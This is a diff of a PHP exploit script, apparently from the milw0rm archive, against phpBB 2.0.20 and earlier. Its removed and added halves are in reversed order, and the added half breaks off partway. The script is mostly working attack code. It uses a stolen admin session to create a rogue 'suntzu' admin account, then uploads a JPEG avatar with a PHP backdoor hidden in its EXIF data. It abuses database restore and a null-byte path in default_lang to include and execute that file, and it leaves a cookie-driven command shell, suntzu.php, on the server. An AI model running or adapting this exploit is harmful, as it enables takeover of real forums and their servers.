-chr(0xff).chr(0xd8).chr(0xff).chr(0xfe).chr(0x01).chr(0x07).chr(0x3c).chr(0x3f).
-chr(0x70).chr(0x68).chr(0x70).chr(0x0d).chr(0x0a).chr(0x24).chr(0x66).chr(0x70).
-chr(0x3d).chr(0x66).chr(0x6f).chr(0x70).chr(0x65).chr(0x6e).chr(0x28).chr(0x22).
-chr(0x73).chr(0x75).chr(0x6e).chr(0x74).chr(0x7a).chr(0x75).chr(0x2e).chr(0x70).
-chr(0x68).chr(0x70).chr(0x22).chr(0x2c).chr(0x22).chr(0x77).chr(0x22).chr(0x29).
-chr(0x3b).chr(0x0d).chr(0x0a).chr(0x66).chr(0x70).chr(0x75).chr(0x74).chr(0x73).
-chr(0x28).chr(0x24).chr(0x66).chr(0x70).chr(0x2c).chr(0x22).chr(0x3c).chr(0x3f).
-chr(0x70).chr(0x68).chr(0x70).chr(0x20).chr(0x65).chr(0x72).chr(0x72).chr(0x6f).
-chr(0x72).chr(0x5f).chr(0x72).chr(0x65).chr(0x70).chr(0x6f).chr(0x72).chr(0x74).
-chr(0x69).chr(0x6e).chr(0x67).chr(0x28).chr(0x30).chr(0x29).chr(0x3b).chr(0x73).
-chr(0x65).chr(0x74).chr(0x5f).chr(0x74).chr(0x69).chr(0x6d).chr(0x65).chr(0x5f).
-chr(0x6c).chr(0x69).chr(0x6d).chr(0x69).chr(0x74).chr(0x28).chr(0x30).chr(0x29).
-chr(0x3b).chr(0x69).chr(0x66).chr(0x20).chr(0x28).chr(0x67).chr(0x65).chr(0x74).
-chr(0x5f).chr(0x6d).chr(0x61).chr(0x67).chr(0x69).chr(0x63).chr(0x5f).chr(0x71).
-chr(0x75).chr(0x6f).chr(0x74).chr(0x65).chr(0x73).chr(0x5f).chr(0x67).chr(0x70).
-chr(0x63).chr(0x28).chr(0x29).chr(0x29).chr(0x20).chr(0x7b).chr(0x5c).chr(0x24).
-chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49).chr(0x45).chr(0x5b).
-chr(0x63).chr(0x6d).chr(0x64).chr(0x5d).chr(0x3d).chr(0x73).chr(0x74).chr(0x72).
-chr(0x69).chr(0x70).chr(0x73).chr(0x6c).chr(0x61).chr(0x73).chr(0x68).chr(0x65).
-chr(0x73).chr(0x28).chr(0x5c).chr(0x24).chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).
-chr(0x4b).chr(0x49).chr(0x45).chr(0x5b).chr(0x63).chr(0x6d).chr(0x64).chr(0x5d).
-chr(0x29).chr(0x3b).chr(0x7d).chr(0x65).chr(0x63).chr(0x68).chr(0x6f).chr(0x20).
-chr(0x35).chr(0x36).chr(0x37).chr(0x38).chr(0x39).chr(0x3b).chr(0x70).chr(0x61).
-chr(0x73).chr(0x73).chr(0x74).chr(0x68).chr(0x72).chr(0x75).chr(0x28).chr(0x5c).
-chr(0x24).chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49).chr(0x45).
-chr(0x5b).chr(0x63).chr(0x6d).chr(0x64).chr(0x5d).chr(0x29).chr(0x3b).chr(0x65).
-chr(0x63).chr(0x68).chr(0x6f).chr(0x20).chr(0x35).chr(0x36).chr(0x37).chr(0x38).
-chr(0x39).chr(0x3b).chr(0x3f).chr(0x3e).chr(0x22).chr(0x29).chr(0x3b).chr(0x0d).
-chr(0x0a).chr(0x66).chr(0x63).chr(0x6c).chr(0x6f).chr(0x73).chr(0x65).chr(0x28).
-chr(0x24).chr(0x66).chr(0x70).chr(0x29).chr(0x3b).chr(0x0d).chr(0x0a).chr(0x63).
-chr(0x68).chr(0x6d).chr(0x6f).chr(0x64).chr(0x28).chr(0x22).chr(0x73).chr(0x75).
-chr(0x6e).chr(0x74).chr(0x7a).chr(0x75).chr(0x2e).chr(0x70).chr(0x68).chr(0x70).
-chr(0x22).chr(0x2c).chr(0x37).chr(0x37).chr(0x37).chr(0x29).chr(0x3b).chr(0x0d).
-chr(0x0a).chr(0x3f).chr(0x3e).chr(0xff).chr(0xe0).chr(0x00).chr(0x10).chr(0x4a).
-chr(0x46).chr(0x49).chr(0x46).chr(0x00).chr(0x01).chr(0x01).chr(0x01).chr(0x00).
-chr(0x48).chr(0x00).chr(0x48).chr(0x00).chr(0x00).chr(0xff).chr(0xdb).chr(0x00).
-chr(0x43).chr(0x00).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
-chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
-chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
-chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
-chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
-chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
-chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
-chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
-chr(0x01).chr(0x01).chr(0xff).chr(0xdb).chr(0x00).chr(0x43).chr(0x01).chr(0x01).
-chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
-chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
-chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
-chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
-chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
-chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
-chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
-chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0xff).
-chr(0xc0).chr(0x00).chr(0x11).chr(0x08).chr(0x00).chr(0x01).chr(0x00).chr(0x01).
-chr(0x03).chr(0x01).chr(0x11).chr(0x00).chr(0x02).chr(0x11).chr(0x01).chr(0x03).
-chr(0x11).chr(0x01).chr(0xff).chr(0xc4).chr(0x00).chr(0x14).chr(0x00).chr(0x01).
-chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
-chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x08).
-chr(0xff).chr(0xc4).chr(0x00).chr(0x14).chr(0x10).chr(0x01).chr(0x00).chr(0x00).
-chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
-chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0xff).chr(0xc4).
-chr(0x00).chr(0x15).chr(0x01).chr(0x01).chr(0x01).chr(0x00).chr(0x00).chr(0x00).
-chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
-chr(0x00).chr(0x00).chr(0x00).chr(0x08).chr(0x09).chr(0xff).chr(0xc4).chr(0x00).
-chr(0x14).chr(0x11).chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
-chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
-chr(0x00).chr(0x00).chr(0x00).chr(0xff).chr(0xda).chr(0x00).chr(0x0c).chr(0x03).
-chr(0x01).chr(0x00).chr(0x02).chr(0x11).chr(0x03).chr(0x11).chr(0x00).chr(0x3f).
-chr(0x00).chr(0x23).chr(0x94).chr(0x09).chr(0x2e).chr(0xff).chr(0xd9).chr(0x00);
-
-/*
-this image has this code inside as EXIF metadata content
-<?php
-$fp=fopen("suntzu.php","w");
-fputs($fp,"<?php error_reporting(0);set_time_limit(0);if (get_magic_quotes_gpc()) {\$_COOKIE[cmd]=stripslashes(\$_COOKIE[cmd]);}echo 56789;passthru(\$_COOKIE[cmd]);echo 56789;?>");
-fclose($fp);
-chmod("suntzu.php",777);
-?>
-*/
-
-$data='-----------------------------7d62702f250530
-Content-Disposition: form-data; name="username"
-
-suntzu
------------------------------7d62702f250530
-Content-Disposition: form-data; name="email"
-
-suntzu@fakemail.com
------------------------------7d62702f250530
-Content-Disposition: form-data; name="cur_password"
-
-
------------------------------7d62702f250530
-Content-Disposition: form-data; name="new_password"
-
-
------------------------------7d62702f250530
-Content-Disposition: form-data; name="password_confirm"
-
-
------------------------------7d62702f250530
-Content-Disposition: form-data; name="icq"
-
-
------------------------------7d62702f250530
-Content-Disposition: form-data; name="aim"
-
-
------------------------------7d62702f250530
-Content-Disposition: form-data; name="msn"
-
-
------------------------------7d62702f250530
-Content-Disposition: form-data; name="yim"
-
-
------------------------------7d62702f250530
-Content-Disposition: form-data; name="website"
-
-
------------------------------7d62702f250530
-Content-Disposition: form-data; name="location"
-
-
------------------------------7d62702f250530
-Content-Disposition: form-data; name="occupation"
-
-
------------------------------7d62702f250530
-Content-Disposition: form-data; name="interests"
-
-
------------------------------7d62702f250530
-Content-Disposition: form-data; name="signature"
-
-suntzu giving you the pain
------------------------------7d62702f250530
-Content-Disposition: form-data; name="viewemail"
-
-1
------------------------------7d62702f250530
-Content-Disposition: form-data; name="hideonline"
-
-1
------------------------------7d62702f250530
-Content-Disposition: form-data; name="notifyreply"
-
-1
------------------------------7d62702f250530
-Content-Disposition: form-data; name="notifypm"
-
-1
------------------------------7d62702f250530
-Content-Disposition: form-data; name="popup_pm"
-
-1
------------------------------7d62702f250530
-Content-Disposition: form-data; name="attachsig"
-
-1
------------------------------7d62702f250530
-Content-Disposition: form-data; name="allowbbcode"
-
-1
------------------------------7d62702f250530
-Content-Disposition: form-data; name="allowhtml"
-
-1
------------------------------7d62702f250530
-Content-Disposition: form-data; name="allowsmilies"
-
-1
------------------------------7d62702f250530
-Content-Disposition: form-data; name="language"
-
-italian
------------------------------7d62702f250530
-Content-Disposition: form-data; name="style"
-
-1047
------------------------------7d62702f250530
-Content-Disposition: form-data; name="timezone"
-
-2
------------------------------7d62702f250530
-Content-Disposition: form-data; name="dateformat"
-
-D M d, Y g:i a
------------------------------7d62702f250530
-Content-Disposition: form-data; name="MAX_FILE_SIZE"
-
-100000
------------------------------7d62702f250530
-Content-Disposition: form-data; name="avatar"; filename="whatever.jpeg";
-Content-Type: image/pjpeg
-
-'.$avatar.'
------------------------------7d62702f250530
-Content-Disposition: form-data; name="avatarurl"
-
-
------------------------------7d62702f250530
-Content-Disposition: form-data; name="avatarremoteurl"
-
-
------------------------------7d62702f250530
-Content-Disposition: form-data; name="mode"
-
-editprofile
------------------------------7d62702f250530
-Content-Disposition: form-data; name="agreed"
-
-true
------------------------------7d62702f250530
-Content-Disposition: form-data; name="coppa"
-
-0
------------------------------7d62702f250530
-Content-Disposition: form-data; name="user_id"
-
-999999
------------------------------7d62702f250530
-Content-Disposition: form-data; name="current_email"
-
-
------------------------------7d62702f250530
-Content-Disposition: form-data; name="submit"
-
-Submit
------------------------------7d62702f250530--
-';
-
-$packet="POST ".$p."profile.php HTTP/1.0\r\n";
-$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
-$packet.="Referer: http://".$host.$path."profile.php?mode=editprofile\r\n";
-$packet.="Accept-Language: it\r\n";
-$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d62702f250530\r\n";
-$packet.="Accept-Encoding: gzip, deflate\r\n";
-$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Content-Length: ".strlen($data)."\r\n";
-$packet.="Connection: Close\r\n";
-$packet.="Cache-Control: no-cache\r\n";
-$packet.="Cookie: ".$cookie."\r\n\r\n";
-$packet.=$data;
-sendpacketii($packet);
-sleep(1);
-
-echo "step 4 -> retrieve new filename for avatar from profile page...\r\n";
-$packet="GET ".$p."profile.php?mode=editprofile HTTP/1.0\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Cookie: ".$cookie."\r\n\r\n";
-$packet.="Connection: Close\r\n\r\n";
-sendpacketii($packet);
-$temp=explode("images/avatars/",$html);
-$temp2=explode("\"",$temp[1]);
-$avatar_name=$temp2[0];
-echo "avatar filename -> ".$avatar_name."\r\n";
-if ($avatar_name=='') {die("Unable to retrieve filename...");}
-
-echo "step 5 -> replace default_lang value in phpbb_config table with our path to shell, breaking path with a null char...\r\n";
-$sql='
-#
-# our path to avatar, using a null char to break the path
-#
-
-UPDATE phpbb_config SET config_value=CONCAT("english/../../images/avatars/'.$avatar_name.'",CHAR(0)) where config_name="default_lang";
-
-';
-
-$data='-----------------------------7d62702f250530
-Content-Disposition: form-data; name="backup_file"; filename="suntzu.sql";
-Content-Type: text/plain
-
-'.$sql.'
------------------------------7d62702f250530
-Content-Disposition: form-data; name="perform"
-
-restore
------------------------------7d62702f250530
-Content-Disposition: form-data; name="restore_start"
-
-Start Restore
------------------------------7d62702f250530--
-';
-$packet="POST ".$p."admin/admin_db_utilities.php?sid=".$session_id." HTTP/1.0\r\n";
-$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
-$packet.="Referer: http://".$host.$path."profile.php?mode=editprofile\r\n";
-$packet.="Accept-Language: it\r\n";
-$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d62702f250530\r\n";
-$packet.="Accept-Encoding: gzip, deflate\r\n";
-$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Content-Length: ".strlen($data)."\r\n";
-$packet.="Connection: Close\r\n";
-$packet.="Cache-Control: no-cache\r\n";
-$packet.="Cookie: ".$cookie."\r\n\r\n";
-$packet.=$data;
-sendpacketii($packet);
-if (eregi("The Database has been successfully restored",$html))
-{
-echo "Done...\r\n";
-}
-else
-{
-die("Unable to modify table...");
-}
-
-echo "step 6 -> execute code inside jpeg file\r\n";
-$packet="GET ".$p."faq.php HTTP/1.0\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Connection: Close\r\n\r\n";
-sendpacketii($packet);
-sleep(1);
-
-echo "step 7 -> Launch commands...\r\n";
-$packet="GET ".$p."suntzu.php HTTP/1.0\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Cookie: cmd=dir;\r\n";
-$packet.="Connection: Close\r\n\r\n";
-sendpacketii($packet);
-if (strstr($html,"56789"))
-{
-  echo "Exploit succeeded...\r\n";
-  $temp=explode("56789",$html);
-  echo "\r\n".$temp[1]."\r\n";
-}
-else
-{
-  echo "Exploit failed...however you will be able to login as admin\r\n";
-  echo "with username \"suntzu\" and password \"suntzu\"\r\n";
-}
-
-
-echo "step 8 -> restore phpbb_config with the old value to keep the board accessible\r\n";
-$sql='
-#
-# old value for default_lang
-#
-
-UPDATE phpbb_config SET config_value="english" where config_name="default_lang";
-
-';
-
-$data='-----------------------------7d62702f250530
-Content-Disposition: form-data; name="backup_file"; filename="suntzu.sql";
-Content-Type: text/plain
-
-'.$sql.'
------------------------------7d62702f250530
-Content-Disposition: form-data; name="perform"
-
-restore
------------------------------7d62702f250530
-Content-Disposition: form-data; name="restore_start"
-
-Start Restore
------------------------------7d62702f250530--
-';
-$packet="POST ".$p."admin/admin_db_utilities.php?sid=".$session_id." HTTP/1.0\r\n";
-$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
-$packet.="Referer: http://".$host.$path."profile.php?mode=editprofile\r\n";
-$packet.="Accept-Language: it\r\n";
-$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d62702f250530\r\n";
-$packet.="Accept-Encoding: gzip, deflate\r\n";
-$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Content-Length: ".strlen($data)."\r\n";
-$packet.="Connection: Close\r\n";
-$packet.="Cache-Control: no-cache\r\n";
-$packet.="Cookie: ".$cookie."\r\n\r\n";
-$packet.=$data;
-sendpacketii($packet);
-if (eregi("The Database has been successfully restored",$html))
-{
-echo "Done...\r\n";
-}
-else
-{
-die("Unable to modify table...");
-}
-?>
-
-# milw0rm.com [2006-05-13]
+#!/usr/bin/php -q -d short_open_tag=on
+<?
+echo "PhpBB <= v2.0.20 \"Admin/Restore Database/default_lang remote commands execution\r\n";
+echo "by rgod rgod@autistici.org\r\n";
+echo "site: http://retrogod.altervista.org\r\n";
+echo "-> you need an admin sid, works regardless of magic_quotes_gpc settings\r\n";
+echo "tested and working against a fresh PhpBB installation\r\n\r\n";
+
+if ($argc<5) {
+echo "Usage: php ".$argv[0]." host path sid cmd OPTIONS\r\n";
+echo "host:       target server (ip/hostname)\r\n";
+echo "path:       path to PhpBB\r\n";
+echo "sid:        session id\r\n";
+echo "cmd:        a shell command\r\n";
+echo "Options:\r\n";
+echo "   -p[port]:    specify a port other than 80\r\n";
+echo "   -P[ip:port]: specify a proxy\r\n";
+echo "Examples:\r\n";
+echo "php ".$argv[0]." localhost /phpbb/ 8db5cef976c7e0f51c25c92152b56881 cat config.php\r\n";
+echo "php ".$argv[0]." localhost /phpbb/ 8db5cef976c7e0f51c25c92152b56881 ls -la -p81\r\n";
+echo "php ".$argv[0]." localhost / 8db5cef976c7e0f51c25c92152b56881 ls -la -P1.1.1.1:80\r\n\r\n";
+die;
+}
+
+/* explaination:
+
+  if you have admin session id, you can enable avatar uploads, if not activated
+  yet and you can store an arbitrary path for "default_lang" inside phpbb_config
+  database table using the "Database Restore" feature. So you can upload a
+  malicious avatar with php code as EXIF metadata content and submit a query like
+  this:
+
+  UPDATE phpbb_config SET config_value=CONCAT("english/../../images/avatars/297984465bc277af10.jpg",CHAR(0)) where config_name="default_lang";
+
+  note: you can see avatar filename in profile page
+
+  in faq.php, like in other files, near line 62, we have:
+
+  ...
+  include($phpbb_root_path . 'language/lang_' . $board_config['default_lang'] . '/' . $lang_file . '.' . $phpEx);
+  ...
+
+  $board_config['default_lang'] var is not sanitized before to be used
+  to include files, so you can reach the malicious avatar to execute the code
+  inside of it.
+
+  This tool also creates a "suntzu" user with password "suntzu" and a backdoor
+  called suntzu.php, so you do not need sid after the first run
+								              */
+error_reporting(0);
+ini_set("max_execution_time",0);
+ini_set("default_socket_timeout",5);
+
+function quick_dump($string)
+{
+  $result='';$exa='';$cont=0;
+  for ($i=0; $i<=strlen($string)-1; $i++)
+  {
+   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
+   {$result.="  .";}
+   else
+   {$result.="  ".$string[$i];}
+   if (strlen(dechex(ord($string[$i])))==2)
+   {$exa.=" ".dechex(ord($string[$i]));}
+   else
+   {$exa.=" 0".dechex(ord($string[$i]));}
+   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
+  }
+ return $exa."\r\n".$result;
+}
+$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
+function sendpacketii($packet)
+{
+  global $proxy, $host, $port, $html, $proxy_regex;
+  if ($proxy=='') {
+    $ock=fsockopen(gethostbyname($host),$port);
+    if (!$ock) {
+      echo 'No response from '.$host.':'.$port; die;
+    }
+  }
+  else {
+	$c = preg_match($proxy_regex,$proxy);
+    if (!$c) {
+      echo 'Not a valid proxy...';die;
+    }
+    $parts=explode(':',$proxy);
+    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
+    $ock=fsockopen($parts[0],$parts[1]);
+    if (!$ock) {
+      echo 'No response from proxy...';die;
+	}
+  }
+  fputs($ock,$packet);
+  if ($proxy=='') {
+    $html='';
+    while (!feof($ock)) {
+      $html.=fgets($ock);
+    }
+  }
+  else {
+    $html='';
+    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
+      $html.=fread($ock,1);
+    }
+  }
+  fclose($ock);
+  #debug
+  #echo "\r\n".$html;
+
+}
+
+$host=$argv[1];
+$path=$argv[2];
+$cmd="";$port=80;$proxy="";
+for ($i=4; $i<=$argc-1; $i++){
+$temp=$argv[$i][0].$argv[$i][1];
+if (($temp<>"-p") and ($temp<>"-P"))
+{$cmd.=" ".$argv[$i];}
+if ($temp=="-p")
+{
+  $port=str_replace("-p","",$argv[$i]);
+}
+if ($temp=="-P")
+{
+  $proxy=str_replace("-P","",$argv[$i]);
+}
+}
+$cmd=urlencode($cmd);
+if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
+if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
+
+
+
+echo "step 0 -> check if suntzu.php is already installed...\r\n";
+$packet ="GET ".$p."suntzu.php HTTP/1.0\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Cookie: cmd=".$cmd.";\r\n";
+$packet.="Connection: Close\r\n\r\n";
+$packet.=$data;
+sendpacketii($packet);
+if (strstr($html,"56789"))
+{
+  echo "Exploit succeeded...\r\n";
+  $temp=explode("56789",$html);
+  die("\r\n".$temp[1]."\r\n");
+}
+
+echo "Step 0b -> check if exploit has already succeeded but suntzu.php deleted, try to login as suntzu...\r\n";
+$data="username=suntzu";
+$data.="&password=suntzu";
+$data.="&redirect=".urlencode("admin/index.php?admin=1");
+$data.="&admin=1";
+$data.="&login=Log+in";
+$packet="POST ".$p."login.php HTTP/1.0\r\n";
+$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
+$packet.="Referer: http://".$host.$path."/login.php\r\n";
+$packet.="Accept-Language: it\r\n";
+$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
+$packet.="Accept-Encoding: gzip, deflate\r\n";
+$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Content-Length: ".strlen($data)."\r\n";
+$packet.="Connection: Close\r\n";
+$packet.="Cache-Control: no-cache\r\n\r\n";
+$packet.=$data;
+sendpacketii($packet);
+$temp=explode("Set-Cookie: ",$html);
+$temp2=explode(" ",$temp[3]);
+$cookie=$temp2[0];
+$temp2=explode(" ",$temp[4]);
+$cookie.=" ".$temp2[0];
+$temp=explode("admin=1&sid=",$html);
+$temp2=explode("\n",$temp[1]);
+$session_id=trim($temp2[0]);
+if (($cookie=='') | ($session_id=='')) {
+echo "step 0c -> query database to create a \"suntzu\" user with password \"suntzu\"...\r\n";
+$session_id=trim($argv[3]);
+//usually admin user_id is "2", so you need only session id... however, if you have admin cookie, specify it literally
+$cookie="phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D; phpbb2mysql_sid=";
+$cookie.=$session_id.";";
+$sql="
+#
+# let's create a new admin user
+#
+
+INSERT INTO phpbb_users(user_id,user_active,username,user_password,user_level,user_email) VALUES ('999999','1','suntzu','d33d57efba4c05808b5d16532f9d1567','1','suntzu\@fakemail.com');
+
+";
+
+$data='-----------------------------7d62702f250530
+Content-Disposition: form-data; name="backup_file"; filename="suntzu.sql";
+Content-Type: text/plain
+
+'.$sql.'
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="perform"
+
+restore
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="restore_start"
+
+Start Restore
+-----------------------------7d62702f250530--
+';
+
+$packet="POST ".$p."admin/admin_db_utilities.php?sid=".$session_id." HTTP/1.0\r\n";
+$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
+$packet.="Referer: http://".$host.$path."profile.php?mode=editprofile\r\n";
+$packet.="Accept-Language: it\r\n";
+$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d62702f250530\r\n";
+$packet.="Accept-Encoding: gzip, deflate\r\n";
+$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Content-Length: ".strlen($data)."\r\n";
+$packet.="Connection: Close\r\n";
+$packet.="Cache-Control: no-cache\r\n";
+$packet.="Cookie: ".$cookie."\r\n\r\n";
+$packet.=$data;
+sendpacketii($packet);
+if (eregi("The Database has been successfully restored",$html))
+{
+echo "Done...\r\n";
+}
+else
+{
+die("Unable to modify table... maybe wrong admin sid\r\n");
+}
+}
+else
+{
+echo "Cookie ->".$cookie."\r\n";
+echo "sid ->".urlencode($session_id)."\r\n\r\n";
+}
+
+echo "Step 1 -> Login as suntzu...\r\n";
+$data="username=suntzu";
+$data.="&password=suntzu";
+$data.="&redirect=".urlencode("admin/index.php?admin=1");
+$data.="&admin=1";
+$data.="&login=Log+in";
+$packet="POST ".$p."login.php HTTP/1.0\r\n";
+$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
+$packet.="Referer: http://".$host.$path."/login.php\r\n";
+$packet.="Accept-Language: it\r\n";
+$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
+$packet.="Accept-Encoding: gzip, deflate\r\n";
+$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Content-Length: ".strlen($data)."\r\n";
+$packet.="Connection: Close\r\n";
+$packet.="Cache-Control: no-cache\r\n\r\n";
+$packet.=$data;
+sendpacketii($packet);
+$temp=explode("Set-Cookie: ",$html);
+$temp2=explode(" ",$temp[3]);
+$cookie=$temp2[0];
+$temp2=explode(" ",$temp[4]);
+$cookie.=" ".$temp2[0];
+echo "Cookie ->".$cookie."\r\n";
+$temp=explode("admin=1&sid=",$html);
+$temp2=explode("\n",$temp[1]);
+$session_id=trim($temp2[0]);
+echo "sid ->".urlencode($session_id)."\r\n\r\n";
+if (($cookie=='') | ($session_id=='')) {die("Unable to login...");}
+
+echo "step 2 -> enable avatar uploads, if not enabled yet...\r\n";
+$data='-----------------------------7d62702f250530
+Content-Disposition: form-data; name="server_name"
+
+'.$host.'
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="server_port"
+
+'.$port.'
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="script_path"
+
+'.$path.'
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="sitename"
+
+yourdomain.com
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="site_desc"
+
+A _little_ text to describe your forum
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="board_disable"
+
+0
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="require_activation"
+
+0
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="enable_confirm"
+
+0
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="allow_autologin"
+
+1
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="max_autologin_time"
+
+0
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="board_email_form"
+
+0
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="flood_interval"
+
+1
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="search_flood_interval"
+
+1
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="max_login_attempts"
+
+99
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="login_reset_time"
+
+30
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="topics_per_page"
+
+50
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="posts_per_page"
+
+15
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="hot_threshold"
+
+25
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="default_style"
+
+1
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="override_user_style"
+
+1
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="default_lang"
+
+english
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="default_dateformat"
+
+D M d, Y g:i a
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="board_timezone"
+
+1
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="gzip_compress"
+
+0
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="prune_enable"
+
+1
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="cookie_domain"
+
+
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="cookie_name"
+
+phpbb2mysql
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="cookie_path"
+
+/
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="cookie_secure";
+
+0
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="session_length"
+
+3600
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="privmsg_disable"
+
+1
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="max_inbox_privmsgs"
+
+50
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="max_sentbox_privmsgs"
+
+25
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="max_savebox_privmsgs"
+
+50
+-----------------------------7d62702f250530
